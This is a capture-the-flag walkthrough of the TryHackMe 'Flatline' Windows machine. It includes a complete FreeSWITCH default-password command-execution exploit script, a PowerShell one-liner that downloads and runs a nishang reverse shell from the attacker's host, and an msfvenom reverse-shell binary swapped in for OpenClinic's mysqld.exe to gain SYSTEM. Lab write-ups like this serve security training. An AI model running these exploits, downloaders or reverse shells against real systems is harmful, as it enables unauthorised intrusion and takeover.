Flatline (FreeSwitch, OpenClinic)

First, we need to scan using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline  
╰─➤  nmap -A -Pn 10.10.21.42 | tee nmap.log                                                                     130 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 01:17 +0630
Nmap scan report for 10.10.21.42
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2022-04-02T18:46:39+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after:  2022-05-10T16:47:35
|_ssl-date: 2022-04-02T18:46:40+00:00; -56s from scanner time.
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -56s, deviation: 0s, median: -56s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.88 seconds

Port 3389 is RDP. In the result, we see port 8021 is quiet interesting. Let's connect using netcat.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline  
╰─➤  nc 10.10.21.42 8021
Content-Type: auth/request


Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/

Connect using Telnet. After googling a bit, we found default username. Here is a link - http://lists.freeswitch.org/pipermail/freeswitch-users/2009-January/038381.html

╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline  
╰─➤  telnet 10.10.21.42 8021
Trying 10.10.21.42...
Connected to 10.10.21.42.
Escape character is '^]'.
Content-Type: auth/request

auth ClueCon

Content-Type: command/reply
Reply-Text: +OK accepted

help

Content-Type: command/reply
Reply-Text: -ERR command not found

Try to search exploit for this port. Here is a python script to exploit this https://www.exploit-db.com/exploits/47799

#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

Exploit using this python script. Luckily, it worked!!

We can try api system command to run on telnet for command execution.

Let's get reverse shell using nishang tools. At the end of the file, we add Invoke-PowerShellTcp to call itself. Here is at the end of the PowerShellTcp.ps1. ANd then we will change the name of the file to PowerShellTcpEx.ps1.

    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.121 -Port 9001

Execute the exploit.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline  
╰─➤  python3 exploit.py 10.10.21.42 "powershell.exe iex (iwr http://10.9.2.121/Invoke-PowerShellTcpEx.ps1 -UseBasicParsing)"

In netcat session, we got reverse shell from victim machine.

We can read the user flag, but not root flag.

In C:\ directory, we found interesting directory name projects

PS C:\users\Nekrotic\Desktop> cd c:\
PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       15/09/2018     08:19                PerfLogs                                                              
d-r---       09/11/2021     16:41                Program Files                                                         
d-----       09/11/2021     07:13                Program Files (x86)                                                   
d-----       09/11/2021     07:18                projects                                                              
d-r---       09/11/2021     07:28                Users                                                                 
d-----       09/11/2021     16:47                Windows

At this directory, we found openclinic system is running on this system.

PS C:\projects\openclinic> dir


    Directory: C:\projects\openclinic


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       09/11/2021     07:29                jdk1.8                                                                
d-----       09/11/2021     07:19                mariadb                                                               
d-----       09/11/2021     07:30                tomcat8                                                               
d-----       09/11/2021     07:29                Uninstall                                                             
-a----       06/04/2021     23:14            250 configureCountry.bat                                                  
-a----       01/07/2021     18:20            167 configureLanguage.bat                                                 
-a----       09/11/2021     07:18         334840 lua5.1.dll                                                            
-a----       07/06/2021     16:58          93696 OpenClinic GA login.exe                                               
-a----       08/05/2020     12:17          27136 OpenClinicStartServices.exe                                           
-a----       02/05/2021     00:45            316 stopOpenClinicHttp.bat                                                
-a----       09/11/2021     07:18        1389568 uninstall.exe

Here is POC to exploit this https://www.exploit-db.com/exploits/50448. First, we create malicious exe files using msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.2.121 LPORT=9002 -f exe > mysqld_evil.exe

Host it and download this files from victim machine.

curl http://10.9.2.121/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"

Change file name.

PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> mv mysqld_evil.exe mysqld.exe

Restart the machine.

shutdown /r

In netcat session, we got reverse shell with system access.

PreviousAratus (SSH, Process, Ansible)NextOh My Webserver (CVE-2021-41773, Capabilities, Docker, CVE-2021-38647)

Last updated 3 years ago